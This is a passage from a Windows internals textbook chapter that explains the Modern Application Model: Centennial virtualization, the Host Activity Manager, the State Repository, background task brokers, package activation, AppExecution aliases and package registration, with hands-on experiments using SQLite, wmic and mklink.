by Centennial to set up the name redirection of the local user
application data folder. Unlike from the previous case, when the app
creates a new file or folder in the virtualized application data folder,
the file is stored in the application cache folder, and not in the real
one, regardless of whether the file already exists.
One important concept to keep in mind is that the BindFlt filter operates
on single files, whereas Wcnfs and Wcifs drivers operate on folders.
Centennial uses minifilters’ communication ports to correctly set up the
virtualized file system infrastructure. The setup process is completed using a
message-based communication system (where the Centennial runtime sends a
message to the minifilter and waits for its response). Table 8-36 shows a
summary of the file system virtualization applied to Centennial applications.
Table 8-36 File system virtualization applied to Centennial applications
Operation
Result
Read or
enumeration
of a well-
known
Windows
folder
The operation returns a dynamic merge of the
corresponding VFS folder with the local system
counterpart. File that exists in the VFS folder always had
precedence with respect to files that already exist in the
local system one.
Writes on
the
application
data folder
All the writes on the application data folder are
redirected to the local Centennial application cache.
All writes
inside the
package
folder
Forbidden, read-only.
All writes
outside the
package
folder
Allowed if the user has permission.
The Host Activity Manager
Windows 10 has unified various components that were interacting with the
state of a packaged application in a noncoordinated way. As a result, a brand-
new component, called Host Activity Manager (HAM) became the central
component and the only one that manages the state of a packaged application
and exposes a unified API set to all its clients.
Unlike its predecessors, the Host Activity Manager exposes activity-based
interfaces to its clients. A host is the object that represents the smallest unit
of isolation recognized by the Application model. Resources, suspend/resume
and freeze states, and priorities are managed as a single unit, which usually
corresponds to a Windows Job object representing the packaged application.
The job object may contain only a single process for simple applications, but
it could contain even different processes for applications that have multiple
background tasks (such as multimedia players, for example).
In the new Modern Application Model, there are three job types:
■ Mixed A mix of foreground and background activities but typically
associated with the foreground part of the application. Applications
that include background tasks (like music playing or printing) use this
kind of job type.
■ Pure A host that is used for purely background work.
■ System A host that executes Windows code on behalf of the
application (for example, background downloads).
An activity always belongs to a host and represents the generic interface
for client-specific concepts such as windows, background tasks, task
completions, and so on. A host is considered “Active” if its job is unfrozen
and it has at least one running activity. The HAM clients are components that
interact and control the lifetime of activities. Multiple components are HAM
clients: View Manager, Broker Infrastructure, various Shell components (like
the Shell Experience Host), AudioSrv, Task completions, and even the
Windows Service Control Manager.
The Modern application’s lifecycle consists of four states: running,
suspending, suspend-complete, and suspended (states and their interactions
are shown in Figure 8-43.)
■ Running The state where an application is executing part of its code,
other than when it’s suspending. An application could be in “running”
state not only when it is in a foreground state but even when it is
running background tasks, playing music, printing, or any number of
other background scenarios.
■ Suspending This state represents a time-limited transition state that
happens where HAM asks the application to suspend. HAM can do
this for different reasons, like when the application loses the
foreground focus, when the system has limited resources or is
entering a battery-safe mode, or simply because an app is waiting for
some UI event. When this happens, an app has a limited amount of
time to go to the suspended state (usually 5 seconds maximum);
otherwise, it will be terminated.
■ SuspendComplete This state represents an application that has
finished suspending and notifies the system that it is done. Therefore,
its suspend procedure is considered completed.
■ Suspended Once an app completes suspension and notifies the
system, the system freezes the application’s job object using the
NtSetInformationJobObject API call (through the
JobObjectFreezeInformation information class) and, as a result, none
of the app code can run.
Figure 8-43 Scheme of the lifecycle of a packaged application.
With the goal of preserving system efficiency and saving system
resources, the Host Activity Manager by default will always require an
application to suspend. HAM clients need to require keeping an application
alive to HAM. For foreground applications, the component responsible in
keeping the app alive is the View Manager. The same applies for background
tasks: Broker Infrastructure is the component responsible for determining
which process hosting the background activity should remain alive (and will
request to HAM to keep the application alive).
Packaged applications do not have a Terminated state. This means that an
application does not have a real notion of an Exit or Terminate state and
should not try to terminate itself. The actual model for terminating a
Packaged application is that first it gets suspended, and then HAM, if
required, calls NtTerminateJobObject API on the application’s job object.
HAM automatically manages the app lifetime and destroys the process only
as needed. HAM does not decide itself to terminate the application; instead,
its clients are required to do so (the View Manager or the Application
Activation Manager are good examples). A packaged application can’t
distinguish whether it has been suspended or terminated. This allows
Windows to automatically restore the previous state of the application even if
it has been terminated or if the system has been rebooted. As a result, the
packaged application model is completely different from the standard Win32
application model.
To properly suspend and resume a Packaged application, the Host Activity
manager uses the new PsFreezeProcess and PsThawProcess kernel APIs.
The process Freeze and Thaw operations are similar to suspend and resume,
with the following two major differences:
■ A new thread that is injected or created in a context of a deep-frozen
process will not run even in case the CREATE_SUSPENDED flag is
not used at creation time or in case the NtResumeProcess API is
called to start the thread.
■ A new Freeze counter is implemented in the EPROCESS data
structures. This means that a process could be frozen multiple times.
To allow a process to be thawed, the total number of thaw requests
must be equal to the number of freeze requests. Only in this case are
all the nonsuspended threads allowed to run.
The State Repository
The Modern Application Model introduces a new way for storing packaged
applications’ settings, package dependencies, and general application data.
The State Repository is the new central store that contains all this kind of data
and has an important central rule in the management of all modern
applications: Every time an application is downloaded from the store,
installed, activated, or removed, new data is read or written to the repository.
The classical usage example of the State Repository is represented by the user
clicking on a tile in the Start menu. The Start menu resolves the full path of
the application’s activation file (which could be an EXE or a DLL, as already
seen in Chapter 7 of Part 1), reading from the repository. (This is actually
simplified, because the ShellExecutionHost process enumerates all the
modern applications at initialization time.)
The State Repository is implemented mainly in two libraries:
Windows.StateRepository.dll and Windows.StateRepositoryCore.dll.
Although the State Repository Service runs the server part of the repository,
UWP applications talk with the repository using the
Windows.StateRepositoryClient.dll library. (All the repository APIs are full
trust, so WinRT clients need a Proxy to correctly communicate with the
server. This is the rule of another DLL, named
Windows.StateRepositoryPs.dll.) The root location of the State Repository is
stored in the
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Appx\
PackageRepositoryRoot registry value, which usually points to the
C:\ProgramData\Microsoft\Windows\ AppRepository path.
The State Repository is implemented across multiple databases, called
partitions. Tables in the database are called entities. Partitions have different
access and lifetime constraints:
■ Machine This database includes package definitions, an application’s
data and identities, and primary and secondary tiles (used in the Start
menu), and it is the master registry that defines who can access which
package. This data is read extensively by different components (like
the TileDataRepository library, which is used by Explorer and the
Start menu to manage the different tiles), but it’s written primarily by
the AppX deployment (rarely by some other minor components). The
Machine partition is usually stored in a file called StateRepository-
Machine.srd located into the state repository root folder.
■ Deployment Stores machine-wide data mostly used only by the
deployment service (AppxSvc) when a new package is registered or
removed from the system. It includes the applications file list and a
copy of each modern application’s manifest file. The Deployment
partition is usually stored in a file called StateRepository-
Deployment.srd.
All partitions are stored as SQLite databases. Windows compiles its own
version of SQLite into the StateRepository.Core.dll library. This library
exposes the State Repository Data Access Layer (also known as DAL) APIs
that are mainly wrappers to the internal database engine and are called by the
State Repository service.
Sometimes various components need to know when some data in the State
Repository is written or modified. In Windows 10 Anniversary update, the
State Repository has been updated to support changes and events tracking. It
can manage different scenarios:
■ A component wants to subscribe for data changes for a certain entity.
The component receives a callback when the data is changed and
implemented using a SQL transaction. Multiple SQL transactions are
part of a Deployment operation. At the end of each database
transaction, the State Repository determines if a Deployment
operation is completed, and, if so, calls each registered listener.
■ A process is started or wakes from Suspend and needs to discover
what data has changed since it was last notified or looked at. State
Repository could satisfy this request using the ChangeId field, which,
in the tables that supports this feature, represents a unique temporal
identifier of a record.
■ A process retrieves data from the State Repository and needs to know
if the data has changed since it was last examined. Data changes are
always recorded in compatible entities via a new table called
Changelog. The latter always records the time, the change ID of the
event that created the data, and, if applicable, the change ID of the
event that deleted the data.
The modern Start menu uses the changes and events tracking feature of the
State Repository to work properly. Every time the ShellExperienceHost
process starts, it requests the State Repository to notify its controller
(NotificationController.dll) every time a tile is modified, created, or
removed. When the user installs or removes a modern application through the
Store, the application deployment server executes a DB transaction for
inserting or removing the tile. The State Repository, at the end of the
transaction, signals an event that wakes up the controller. In this way, the
Start menu can modify its appearance almost in real time.
Note
In a similar way, the modern Start menu is automatically able to add or
remove an entry for every new standard Win32 application installed. The
application setup program usually creates one or more shortcuts in one of
the classic Start menu folder locations (systemwide path:
C:\ProgramData\Microsoft\ Windows\Start Menu, or per-user path:
C:\Users\<UserName>\AppData\Roaming\Microsoft\Windows\Start
Menu). The modern Start menu uses the services provided by the
AppResolver library to register file system notifications on all the Start
menu folders (through the ReadDirectoryChangesW Win32 API). In this
way, whenever a new shortcut is created in the monitored folders, the
library can get a callback and signal the Start menu to redraw itself.
EXPERIMENT: Witnessing the state repository
You can open each partition of the state repository fairly easily
using your preferred SQLite browser application. For this
experiment, you need to download and install an SQLite browser,
like the open-source DB Browser for SQLite, which you can
download from http://sqlitebrowser.org/. The State Repository path
is not accessible by standard users. Furthermore, each partition’s
file could be in use in the exact moment that you will access it.
Thus, you need to copy the database file in another folder before
trying to open it with the SQLite browser. Open an administrative
command prompt (by typing cmd in the Cortana search box and
selecting Run As Administrator after right-clicking the Command
Prompt label) and insert the following commands:
Click here to view code image
C:\WINDOWS\system32>cd
“C:\ProgramData\Microsoft\Windows\AppRepository”
C:\ProgramData\Microsoft\Windows\AppRepository>copy
StateRepository-Machine.srd
"%USERPROFILE%\Documents"
In this way, you have copied the State Repository machine
partition into your Documents folder. The next stage is to open it.
Start DB Browser for SQLite using the link created in the Start
menu or the Cortana search box and click the Open Database
button. Navigate to the Documents folder, select All Files (*) in the
File Type combo box (the state repository database doesn’t use a
standard SQLite file extension), and open the copied
StateRepository-machine.srd file. The main view of DB Browser
for SQLite is the database structure. For this experiment you need
to choose the Browse Data sheet and navigate through the tables
like Package, Application, PackageLocation, and PrimaryTile.
The Application Activation Manager and many other
components of the Modern Application Model use standard SQL
queries to extract the needed data from the State Repository. For
example, to extract the package location and the executable name
of a modern application, a SQL query like the following one could
be used:
Click here to view code image
SELECT p.DisplayName, p.PackageFullName,
pl.InstalledLocation, a.Executable, pm.Name
FROM Package AS p
INNER JOIN PackageLocation AS pl ON p._PackageID=pl.Package
INNER JOIN PackageFamily AS pm ON
p.PackageFamily=pm._PackageFamilyID
INNER JOIN Application AS a ON a.Package=p._PackageID
WHERE pm.PackageFamilyName="<Package Family Name>"
The DAL (Data Access Layer) uses similar queries to provide
services to its clients.
You can annotate the total number of records in the table and
then install a new application from the store. If, after the
deployment process is completed, you again copy the database file,
you will find that number of the records change. This happens in
multiple tables. Especially if the new app installs a new tile, even
the PrimaryTile table adds a record for the new tile shown in the
Start menu.
The Dependency Mini Repository
Opening an SQLite database and extracting the needed information through
an SQL query could be an expensive operation. Furthermore, the current
architecture requires some interprocess communication done through RPC.
Those two constraints sometimes are too restrictive to be satisfied. A classic
example is represented by a user launching a new application (maybe an
Execution Alias) through the command-line console. Checking the State
Repository every time the system spawns a process introduces a big
performance issue. To fix these problems, the Application Model has
introduced another smaller store that contains Modern applications’
information: the Dependency Mini Repository (DMR).
Unlike from the State Repository, the Dependency Mini Repository does
not make use of any database but stores the data in a Microsoft-proprietary
binary format that can be accessed by any file system in any security context
(even a kernel-mode driver could possibly parse the DMR data). The System
Metadata directory, which is represented by a folder named Packages in the
State Repository root path, contains a list of subfolders, one for every
installed package. The Dependency Mini Repository is represented by a
.pckgdep file, named as the user’s SID. The DMR file is created by the
Deployment service when a package is registered for a user (for further
details, see the “Package registration” section later in this chapter).
The Dependency Mini Repository is heavily used when the system creates
a process that belongs to a packaged application (in the AppX Pre-
CreateProcess extension). Thus, it’s entirely implemented in the Win32
kernelbase.dll (with some stub functions in kernel.appcore.dll). When a
DMR file is opened at process creation time, it is read, parsed, and memory-
mapped into the parent process. After the child process is created, the loader
code maps it even in the child process. The DMR file contains various
information, including
■ Package information, like the ID, full name, full path, and publisher
■ Application information: application user model ID and relative ID,
description, display name, and graphical logos
■ Security context: AppContainer SID and capabilities
■ Target platform and the package dependencies graph (used in case a
package depends on one or more others)
The DMR file is designed to contain even additional data in future
Windows versions, if required. Using the Dependency Mini Repository file,
the process creation is fast enough and does not require a query into the State
Repository. Noteworthy is that the DMR file is closed after the process
creation. So, it is possible to rewrite the .pckgdep file, adding an optional
package even when the Modern application is executing. In this way, the user
can add a feature to its modern application without restarting it. Some small
parts of the package mini repository (mostly only the package full name and
path) are replicated into different registry keys as cache for a faster access.
The cache is often used for common operations (like understanding if a
package exists).
Background tasks and the Broker Infrastructure
UWP applications usually need a way to run part of their code in the
background. This code doesn’t need to interact with the main foreground
process. UWP supports background tasks, which provide functionality to the
application even when the main process is suspended or not running. There
are multiple reasons why an application may use background tasks: real-time
communications, mails, IM, multimedia music, video player, and so on. A
background task could be associated by triggers and conditions. A trigger is a
global system asynchronous event that, when it happens, signals the starting
of a background task. The background task at this point may or may be not
started based on its applied conditions. For example, a background task used
in an IM application could start only when the user logs on (a system event
trigger) and only if the Internet connection is available (a condition).
In Windows 10, there are two types of background tasks:
■ In-process background task The application code and its
background task run in the same process. From a developer’s point of
view, this kind of background task is easier to implement, but it has
the big drawback that if a bug hits its code, the entire application
crashes. The in-process background task doesn’t support all triggers
available for the out-of-process background tasks.
■ Out-of-process background task The application code and its
background task run in different processes (the process could run in a
different job object, too). This type of background task is more
resilient, runs in the backgroundtaskhost.exe host process, and can use
all the triggers and the conditions. If a bug hits the background task,
this will never kill the entire application. The main drawback is
originated from the performance of all the RPC code that needs to be
executed for the interprocess communication between different
processes.
To provide the best user experience for the user, all background tasks have
an execution time limit of 30 seconds total. After 25 seconds, the
Background Broker Infrastructure service calls the task’s Cancellation
handler (in WinRT, this is called OnCanceled event). When this event
happens, the background task still has 5 seconds to completely clean up and
exit. Otherwise, the process that contains the Background Task code (which
could be BackgroundTaskHost.exe in case of out-of-process tasks; otherwise,
it’s the application process) is terminated. Developers of personal or business
UWP applications can remove this limit, but such an application could not be
published in the official Microsoft Store.
The Background Broker Infrastructure (BI) is the central component that
manages all the Background tasks. The component is implemented mainly in
bisrv.dll (the server side), which lives in the Broker Infrastructure service.
Two types of clients can use the services provided by the Background Broker
Infrastructure: Standard Win32 applications and services can import the bi.dll
Background Broker Infrastructure client library; WinRT applications always
link to biwinrt.dll, the library that provides WinRT APIs to modern
applications. The Background Broker Infrastructure could not exist without
the brokers. The brokers are the components that generate the events that are
consumed by the Background Broker Server. There are multiple kinds of
brokers. The most important are the following:
■ System Event Broker Provides triggers for system events like
network connections’ state changes, user logon and logoff, system
battery state changes, and so on
■ Time Broker Provides repetitive or one-shot timer support
■ Network Connection Broker Provides a way for the UWP
applications to get an event when a connection is established on
certain ports
■ Device Services Broker Provides device arrivals triggers (when a
user connects or disconnects a device). Works by listening Pnp events
originated from the kernel
■ Mobile Broad Band Experience Broker Provides all the critical
triggers for phones and SIMs
The server part of a broker is implemented as a windows service. The
implementation is different for every broker. Most work by subscribing to
WNF states (see the “Windows Notification Facility” section earlier in this
chapter for more details) that are published by the Windows kernel; others
are built on top of standard Win32 APIs (like the Time Broker). Covering the
implementation details of all the brokers is outside the scope of this book. A
broker can simply forward events that are generated somewhere else (like in
the Windows kernel) or can generates new events based on some other
conditions and states. Brokers forward events that they managed through
WNF: each broker creates a WNF state name that the background
infrastructure subscribes to. In this way, when the broker publishes new state
data, the Broker Infrastructure, which is listening, wakes up and forwards the
event to its clients.
Each broker includes even the client infrastructure: a WinRT and a Win32
library. The Background Broker Infrastructure and its brokers expose three
kinds of APIs to its clients:
■ Non-trust APIs Usually used by WinRT components that run under
AppContainer or in a sandbox environment. Supplementary security
checks are made. The callers of this kind of API can’t specify a
different package name or operate on behalf of another user (that is,
BiRtCreateEventForApp).
■ Partial-trust APIs Used by Win32 components that live in a
Medium-IL environment. Callers of this kind of API can specify a
Modern application’s package full name but can’t operate on behalf
of another user (that is, BiPtCreateEventForApp).
■ Full-trust API Used only by high-privileged system or administrative
Win32 services. Callers of these APIs can operate on behalf of
different users and on different packages (that is,
BiCreateEventForPackageName).
Clients of the brokers can decide whether to subscribe directly to an event
provided by the specific broker or subscribe to the Background Broker
Infrastructure. WinRT always uses the latter method. Figure 8-44 shows an
example of initialization of a Time trigger for a Modern Application
Background task.
Figure 8-44 Architecture of the Time Broker.
Another important service that the Background Broker Infrastructure
provides to the Brokers and to its clients is the storage capability for
background tasks. This means that when the user shuts down and then
restarts the system, all the registered background tasks are restored and
rescheduled as before the system was restarted. To achieve this properly,
when the system boots and the Service Control Manager (for more
information about the Service Control Manager, refer to Chapter 10) starts
the Broker Infrastructure service, the latter, as a part of its initialization,
allocates a root storage GUID, and, using NtLoadKeyEx native API, loads a
private copy of the Background Broker registry hive. The service tells NT
kernel to load a private copy of the hive using a special flag
(REG_APP_HIVE). The BI hive resides in the
C:\Windows\System32\Config\BBI file. The root key of the hive is mounted
as \Registry\A\<Root Storage GUID> and is accessible only to the Broker
Infrastructure service’s process (svchost.exe, in this case; Broker
Infrastructure runs in a shared service host). The Broker Infrastructure hive
contains a list of events and work items, which are ordered and identified
using GUIDs:
■ An event represents a Background task’s trigger It is associated
with a broker ID (which represents the broker that provides the event
type), the package full name, and the user of the UWP application that
it is associated with, and some other parameters.
■ A work item represents a scheduled Background task It contains a
name, a list of conditions, the task entry point, and the associated
trigger event GUID.
The BI service enumerates each subkey and then restores all the triggers
and background tasks. It cleans orphaned events (the ones that are not
associated with any work items). It then finally publishes a WNF ready state
name. In this way, all the brokers can wake up and finish their initialization.
The Background Broker Infrastructure is deeply used by UWP
applications. Even regular Win32 applications and services can make use of
BI and brokers, through their Win32 client libraries. Some notable examples
are provided by the Task Scheduler service, Background Intelligent Transfer
service, Windows Push Notification service, and AppReadiness.
Packaged applications setup and startup
Packaged application lifetime is different than standard Win32 applications.
In the Win32 world, the setup procedure for an application can vary from just
copying and pasting an executable file to executing complex installation
programs. Even if launching an application is just a matter of running an
executable file, the Windows loader takes care of all the work. The setup of a
Modern application is instead a well-defined procedure that passes mainly
through the Windows Store. In Developer mode, an administrator is even
able to install a Modern application from an external .Appx file. The package
file needs to be digitally signed, though. This package registration procedure
is complex and involves multiple components.
Before digging into package registration, it’s important to understand
another key concept that belongs to Modern applications: package activation.
Package activation is the process of launching a Modern application, which
can or cannot show a GUI to the user. This process is different based on the
type of Modern application and involves various system components.
Package activation
A user is not able to launch a UWP application by just executing its .exe file
(excluding the case of the new AppExecution aliases, created just for this
reason. We describe AppExecution aliases later in this chapter). To correctly
activate a Modern application, the user needs to click a tile in the modern
menu, use a special link file that Explorer is able to parse, or use some other
activation points (double-click an application’s document, invoke a special
URL, and so on). The ShellExperienceHost process decides which activation
performs based on the application type.
UWP applications
The main component that manages this kind of activation is the Activation
Manager, which is implemented in ActivationManager.dll and runs in a
sihost.exe service because it needs to interact with the user’s desktop. The
activation manager strictly cooperates with the View Manager. The modern
menu calls into the Activation Manager through RPC. The latter starts the
activation procedure, which is schematized in Figure 8-45:
■ Gets the SID of the user that is requiring the activation, the package
family ID, and PRAID of the package. In this way, it can verify that
the package is actually registered in the system (using the
Dependency Mini Repository and its registry cache).
■ If the previous check yields that the package needs to be registered, it
calls into the AppX Deployment client and starts the package
registration. A package might need to be registered in case of “on-
demand registration,” meaning that the application is downloaded but
not completely installed (this saves time, especially in enterprise
environments) or in case the application needs to be updated. The
Activation Manager knows if one of the two cases happens thanks to
the State Repository.
■ It registers the application with HAM and creates the HAM host for
the new package and its initial activity.
■ Activation Manager talks with the View Manager (through RPC),
with the goal of initializing the GUI activation of the new session
(even in case of background activations, the View Manager always
needs to be informed).
■ The activation continues in the DcomLaunch service because the
Activation Manager at this stage uses a WinRT class to launch the
low-level process creation.
■ The DcomLaunch service is responsible in launching COM, DCOM,
and WinRT servers in response to object activation requests and is
implemented in the rpcss.dll library. DcomLaunch captures the
activation request and prepares to call the CreateProcessAsUser
Win32 API. Before doing this, it needs to set the proper process
attributes (like the package full name), ensure that the user has the
proper license for launching the application, duplicate the user token,
set the low integrity level to the new one, and stamp it with the
needed security attributes. (Note that the DcomLaunch service runs
under a System account, which has TCB privilege. This kind of token
manipulation requires TCB privilege. See Chapter 7 of Part 1 for
further details.) At this point, DcomLaunch calls
CreateProcessAsUser, passing the package full name through one of
the process attributes. This creates a suspended process.
■ The rest of the activation process continues in Kernelbase.dll. The
token produced by DcomLaunch is still not an AppContainer but
contains the UWP Security attributes. A Special code in the
CreateProcessInternal function uses the registry cache of the
Dependency Mini Repository to gather the following information
about the packaged application: Root Folder, Package State,
AppContainer package SID, and list of application’s capabilities. It
then verifies that the license has not been tampered with (a feature
used extensively by games). At this point, the Dependency Mini
Repository file is mapped into the parent process, and the UWP
application DLL alternate load path is resolved.
■ The AppContainer token, its object namespace, and symbolic links
are created with the BasepCreateLowBox function, which performs
the majority of the work in user mode, except for the actual
AppContainer token creation, which is performed using the
NtCreateLowBoxToken kernel function. We have already covered
AppContainer tokens in Chapter 7 of Part 1.
■ The kernel process object is created as usual by using
NtCreateUserProcess kernel API.
■ After the CSRSS subsystem has been informed, the
BasepPostSuccessAppXExtension function maps the Dependency
Mini Repository in the PEB of the child process and unmaps it from
the parent process. The new process can then be finally started by
resuming its main thread.
Figure 8-45 Scheme of the activation of a modern UWP application.
Centennial applications
The Centennial applications activation process is similar to the UWP
activation but is implemented in a totally different way. The modern menu,
ShellExperienceHost, always calls into Explorer.exe for this kind of
activation. Multiple libraries are involved in the Centennial activation type
and mapped in Explorer, like Daxexec.dll, Twinui.dll, and
Windows.Storage.dll. When Explorer receives the activation request, it gets
the package full name and application id, and, through RPC, grabs the main
application executable path and the package properties from the State
Repository. It then executes the same steps (2 through 4) as for UWP
activations. The main difference is that, instead of using the DcomLaunch
service, Centennial activation, at this stage, it launches the process using the
ShellExecute API of the Shell32 library. ShellExecute code has been updated
to recognize Centennial applications and to use a special activation procedure
located in Windows.Storage.dll (through COM). The latter library uses RPC
to call the RAiLaunchProcessWithIdentity function located in the AppInfo
service. AppInfo uses the State Repository to verify the license of the
application, the integrity of all its files, and the calling process’s token. It then
stamps the token with the needed security attributes and finally creates the
process in a suspended state. AppInfo passes the package full name to the
CreateProcessAsUser API using the
PROC_THREAD_ATTRIBUTE_PACKAGE_FULL_NAME process attribute.
Unlike the UWP activation, no AppContainer is created at all, AppInfo
calls the PostCreateProcess DesktopAppXActivation function of
DaxExec.dll, with the goal of initializing the virtualization layer of
Centennial applications (registry and file system). Refer to the “Centennial
application” section earlier in this chapter for further information.
EXPERIMENT: Activate Modern apps through the
command line
In this experiment, you will understand better the differences
between UWP and Centennial, and you will discover the
motivation behind the choice to activate Centennial applications
using the ShellExecute API. For this experiment, you need to
install at least one Centennial application. At the time of this
writing, a simple method to recognize this kind of application exists
by using the Windows Store. In the store, after selecting the target
application, scroll down to the “Additional Information” section. If
you see “This app can: Uses all system resources,” which is usually
located before the “Supported languages” part, it means that the
application is Centennial type.
In this experiment, you will use Notepad++. Search and install
the “(unofficial) Notepad++” application from the Windows Store.
Then open the Camera application and Notepad++. Open an
administrative command prompt (you can do this by typing cmd in
the Cortana search box and selecting Run As Administrator after
right-clicking the Command Prompt label). You need to find the
full path of the two running packaged applications using the
following commands:
Click here to view code image
wmic process where "name=’WindowsCamera.exe’" get
ExecutablePath
wmic process where "name=’notepad++.exe’" get
ExecutablePath
Now you can create two links to the application’s executables
using the commands:
Click here to view code image
mklink "%USERPROFILE%\Desktop\notepad.exe" "<Notepad++
executable Full Path>"
mklink "%USERPROFILE%\Desktop\camera.exe" "<WindowsCamera
executable full path>
replacing the content between the < and > symbols with the real
executable path discovered by the first two commands.
You can now close the command prompt and the two
applications. You should have created two new links in your
desktop. Unlike with the Notepad.exe link, if you try to launch the
Camera application from your desktop, the activation fails, and
Windows returns an error dialog box like the following:
This happens because Windows Explorer uses the Shell32
library to activate executable links. In the case of UWP, the
Shell32 library has no idea that the executable it will launch is a
UWP application, so it calls the CreateProcessAsUser API without
specifying any package identity. In a different way, Shell32 can
identify Centennial apps; thus, in this case, the entire activation
process is executed, and the application correctly launched. If you
try to launch the two links using the command prompt, none of
them will correctly start the application. This is explained by the
fact that the command prompt doesn’t make use of Shell32 at all.
Instead, it invokes the CreateProcess API directly from its own
code. This demonstrates the different activations of each type of
packaged application.
Note
Starting with Windows 10 Creators Update (RS2), the Modern
Application Model supports the concept of Optional packages (internally
called RelatedSet). Optional packages are heavily used in games, where
the main game supports even DLC (or expansions), and in packages that
represent suites: Microsoft Office is a good example. A user can
download and install Word and implicitly the framework package that
contains all the Office common code. When the user wants to install even
Excel, the deployment operation could skip the download of the main
Framework package because Word is an optional package of its main
Office framework.
Optional packages have relationship with their main packages through
their manifest files. In the manifest file, there is the declaration of the
dependency to the main package (using AMUID). Deeply describing
Optional packages architecture is beyond the scope of this book.
AppExecution aliases
As we have previously described, packaged applications could not be
activated directly through their executable file. This represents a big
limitation, especially for the new modern Console applications. With the goal
of enabling the launch of Modern apps (Centennial and UWP) through the
command line, starting from Windows 10 Fall Creators Update (build 1709),
the Modern Application Model has introduced the concept of AppExecution
aliases. With this new feature, the user can launch Edge or any other modern
applications through the console command line. An AppExecution alias is
basically a 0-bytes length executable file located in C:\Users\
<UserName>\AppData\Local\Microsoft\WindowsApps (as shown in Figure
8-46.). The location is added in the system executable search path list
(through the PATH environment variable); as a result, to execute a modern
application, the user could specify any executable file name located in this
folder without the complete path (like in the Run dialog box or in the console
command line).
Figure 8-46 The AppExecution aliases main folder.
How can the system execute a 0-byte file? The answer lies in a little-
known feature of the file system: reparse points. Reparse points are usually
employed for symbolic links creation, but they can store any data, not only
symbolic link information. The Modern Application Model uses this feature
to store the packaged application’s activation data (package family name,
Application user model ID, and application path) directly into the reparse
point.
When the user launches an AppExecution alias executable, the
CreateProcess API is used as usual. The NtCreateUserProcess system call,
used to orchestrate the kernel-mode process creation (see the “Flow of
CreateProcess” section of Chapter 3 in Part 1, for details) fails because the
content of the file is empty. The file system, as part of normal process
creation, opens the target file (through IoCreateFileEx API), encounters the
reparse point data (while parsing the last node of the path) and returns a
STATUS_REPARSE code to the caller. NtCreateUserProcess translates this
code to the STATUS_IO_REPARSE_TAG_NOT_HANDLED error and exits.
The CreateProcess API now knows that the process creation has failed due
to an invalid reparse point, so it loads and calls into the
ApiSetHost.AppExecutionAlias.dll library, which contains code that parses
modern applications’ reparse points.
The library’s code parses the reparse point, grabs the packaged application
activation data, and calls into the AppInfo service with the goal of correctly
stamping the token with the needed security attributes. AppInfo verifies that
the user has the correct license for running the packaged application and
checks the integrity of its files (through the State Repository). The actual
process creation is done by the calling process. The CreateProcess API
detects the reparse error and restarts its execution starting with the correct
package executable path (usually located in C:\Program
Files\WindowsApps\). This time, it correctly creates the process and the
AppContainer token or, in case of Centennial, initializes the virtualization
layer (actually, in this case, another RPC into AppInfo is used again).
Furthermore, it creates the HAM host and its activity, which are needed for
the application. The activation at this point is complete.
EXPERIMENT: Reading the AppExecution alias data
In this experiment, you extract AppExecution alias data from the 0-
bytes executable file. You can use the FsReparser utility (found in
this book’s downloadable resources) to parse both the reparse
points or the extended attributes of the NTFS file system. Just run
the tool in a command prompt window and specify the READ
command-line parameter:
Click here to view code image
C:\Users\Andrea\AppData\Local\Microsoft\WindowsApps>fsrepars
er read MicrosoftEdge.exe
File System Reparse Point / Extended Attributes Parser 0.1
Copyright 2018 by Andrea Allievi (AaLl86)
Reading UWP attributes...
Source file: MicrosoftEdge.exe.
The source file does not contain any Extended Attributes.
The file contains a valid UWP Reparse point (version 3).
Package family name: Microsoft.MicrosoftEdge_8wekyb3d8bbwe
Application User Model Id:
Microsoft.MicrosoftEdge_8wekyb3d8bbwe!MicrosoftEdge
UWP App Target full path:
C:\Windows\System32\SystemUWPLauncher.exe
Alias Type: UWP Single Instance
As you can see from the output of the tool, the CreateProcess
API can extract all the information that it needs to properly execute
a modern application’s activation. This explains why you can
launch Edge from the command line.
Package registration
When a user wants to install a modern application, usually she opens the
AppStore, looks for the application, and clicks the Get button. This action
starts the download of an archive that contains a bunch of files: the package
manifest file, the application digital signature, and the block map, which
represent the chain of trust of the certificates included in the digital signature.
The archive is initially stored in the
C:\Windows\SoftwareDistribution\Download folder. The AppStore process
(WinStore.App.exe) communicates with the Windows Update service
(wuaueng.dll), which manages the download requests.
The downloaded files are manifests that contain the list of all the modern
application’s files, the application dependencies, the license data, and the
steps needed to correctly register the package. The Windows Update service
recognizes that the download request is for a modern application, verifies the
calling process token (which should be an AppContainer), and, using services
provided by the AppXDeploymentClient.dll library, verifies that the package
is not already installed in the system. It then creates an AppX Deployment
request and, through RPC, sends it to the AppX Deployment Server. The
latter runs as a PPL service in a shared service host process (which hosts
even the Client License Service, running as the same protected level). The
Deployment Request is placed into a queue, which is managed
asynchronously. When the AppX Deployment Server sees the request, it
dequeues it and spawns a thread that starts the actual modern application
deployment process.
Note
Starting with Windows 8.1, the UWP deployment stack supports the
concept of bundles. Bundles are packages that contain multiple resources,
like different languages or features that have been designed only for
certain regions. The deployment stack implements an applicability logic
that can download only the needed part of the compressed bundle after
checking the user profile and system settings.
A modern application deployment process involves a complex sequence of
events. We summarize here the entire deployment process in three main
phases.
Phase 1: Package staging
After Windows Update has downloaded the application manifest, the AppX
Deployment Server verifies that all the package dependencies are satisfied,
checks the application prerequisites, like the target supported device family
(Phone, Desktop, Xbox, and so on) and checks whether the file system of the
target volume is supported. All the prerequisites that the application needs are
expressed in the manifest file with each dependency. If all the checks pass,
the staging procedure creates the package root directory (usually in
C:\Program Files\WindowsApps\<PackageFullName>) and its subfolders.
Furthermore, it protects the package folders, applying proper ACLs on all of
them. If the modern application is a Centennial type, it loads the daxexec.dll
library and creates VFS reparse points needed by the Windows Container
Isolation minifilter driver (see the “Centennial applications” section earlier in
this chapter) with the goal of virtualizing the application data folder properly.
It finally saves the package root path into the
HKLM\SOFTWARE\Classes\LocalSettings\Software\Microsoft\Windows\
CurrentVersion\AppModel\PackageRepository\Packages\
<PackageFullName> registry key, in the Path registry value.
The staging procedure then preallocates the application’s files on disk,
calculates the final download size, and extracts the server URL that contains
all the package files (compressed in an AppX file). It finally downloads the
final AppX from the remote servers, again using the Windows Update
service.
Phase 2: User data staging
This phase is executed only if the user is updating the application. This phase
simply restores the user data of the previous package and stores them in the
new application path.
Phase 3: Package registration
The most important phase of the deployment is the package registration. This
complex phase uses services provided by
AppXDeploymentExtensions.onecore.dll library (and
AppXDeploymentExtensions .desktop.dll for desktop-specific deployment
parts). We refer to it as Package Core Installation. At this stage, the AppX
